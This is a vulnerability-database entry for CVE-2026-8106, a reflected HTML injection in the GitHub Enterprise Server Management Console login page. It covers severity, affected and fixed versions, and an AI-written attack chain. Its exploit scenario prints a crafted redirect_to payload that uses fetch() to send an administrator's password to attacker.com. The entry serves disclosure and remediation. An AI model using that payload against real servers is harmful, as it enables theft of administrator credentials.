
GitHub Enterprise Server
EUVD-2026-28465 | CVE-2026-8106 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-05-07 GitHub_P GHSA-xqmx-3vx6-fm88
5.9 CVSS 4.0 · GitHub Advisory

Severity by source

GitHub Advisory PRIMARY
5.9 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from GitHub Advisory · only source for this CVE.

CVSS Vector (GitHub Advisory)

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: A
Scope: X

Lifecycle Timeline (4 events)

Analysis Generated: May 08, 2026 - 00:15 (vuln.today)
CVSS changed: May 07, 2026 - 22:22 (NVD), 5.9 (MEDIUM)
CVE Published: May 07, 2026 - 21:18 (nvd), UNKNOWN (no severity yet)
CVE Published: May 07, 2026 - 21:18 (nvd), MEDIUM 5.9

Description (GitHub Advisory)

A reflected HTML injection vulnerability was identified in the GitHub Enterprise Server Management Console login page that could allow credential theft. The redirect_to query parameter on the /setup/unlock endpoint was reflected into an HTML attribute without proper sanitization, enabling an attacker to inject a form element that could capture administrator credentials. Exploitation required an administrator to click a crafted link and enter their credentials. This vulnerability affected GitHub Enterprise Server versions 3.19.1 through 3.19.5 and 3.20.0 through 3.20.1, and was fixed in versions 3.19.6 and 3.20.2. This vulnerability was reported via the GitHub Bug Bounty program.

Analysis (AI)

Reflected HTML injection in GitHub Enterprise Server Management Console login page allows credential theft when administrators click crafted links. The /setup/unlock endpoint reflects the redirect_to query parameter into an HTML attribute without sanitization, enabling attackers to inject malicious form elements that capture credentials. …


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

Recon: Attacker crafts malicious redirect_to URL
Delivery: Sends phishing email to administrator
Exploit: Administrator clicks link
Install: Server reflects unescaped parameter into HTML attribute
C2: JavaScript injects credential-capture form
Execute: Administrator enters credentials
Impact: Attacker steals credentials

Vulnerability Assessment (AI)

Exploitation: Exploitation requires the following specific conditions: (1) the target must be running GitHub Enterprise Server version 3.19.1-3.19.5 or 3.20.0-3.20.1; (2) an administrator must click a crafted link containing a malicious payload in the redirect_to parameter; (3) the administrator must then enter their credentials into the login form. … Additional conditions and limiting factors are described in the full assessment.

Risk Assessment: CVSS 5.9 (medium) with AV:N (network), AC:L (low complexity), but AT:P (passive attack timing) and UI:A (user interaction required) are critical limiting factors. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.

Exploit Scenario: An attacker crafts a URL such as https://github-enterprise.internal/setup/unlock?redirect_to="onload="javascript:fetch('https://attacker.com/steal?creds='%2bdocument.getElementById('password').value) and sends it to a GitHub Enterprise administrator via spear-phishing email. When the administrator clicks the link and logs in, the injected JavaScript executes, exfiltrating the credentials to the attacker's server. …

Remediation: Upgrade GitHub Enterprise Server to version 3.19.6 or later if running 3.19.x, or to version 3.20.2 or later if running 3.20.x. … Detailed patch versions, workarounds, and compensating controls in full report.


CVE-2026-9312 CRITICAL
9.2 May 27

Server-side request forgery in GitHub Enterprise Server lets an unauthenticated attacker coerce the appliance into issui

CVE-2026-0573 CRITICAL
9.0 Feb 18

URL redirection vulnerability in GitHub Enterprise Server allows attacker-controlled redirects through crafted URLs, pot

CVE-2026-3854 HIGH POC
8.7 Mar 10

Remote code execution in GitHub Enterprise Server allows authenticated users with repository push access to execute arbi

CVE-2025-3246 HIGH
8.6 Apr 17

An improper neutralization of input vulnerability was identified in GitHub Enterprise Server that allowed cross-site scr

CVE-2026-4821 HIGH
8.1 Apr 21

An improper neutralization of special elements vulnerability was identified in GitHub Enterprise Server that allowed an

CVE-2026-8034 HIGH
7.9 May 07

Server-side request forgery in GitHub Enterprise Server's notebook viewer enables remote unauthenticated attackers to ac

CVE-2025-3509 HIGH
7.1 Apr 17

A Remote Code Execution (RCE) vulnerability was identified in GitHub Enterprise Server that allowed attackers to execute

CVE-2026-4296 HIGH
7.5 Apr 21

An incorrect regular expression vulnerability was identified in GitHub Enterprise Server that allowed an attacker to byp

CVE-2026-5845 HIGH
7.2 Apr 21

An improper authorization vulnerability in scoped user-to-server (ghu_) token authorization in GitHub Enterprise Server

CVE-2026-1999 HIGH
7.1 Feb 18

GitHub Enterprise Server allows authenticated webhook administrators to bypass network restrictions through Server-Side

CVE-2026-8606 HIGH
7.0 May 26


CVE-2026-1355 MEDIUM
6.5 Feb 18

GitHub Enterprise Server versions before 3.20 contain an authorization bypass in the repository migration upload endpoin


EUVD-2026-28465 vulnerability details – vuln.today
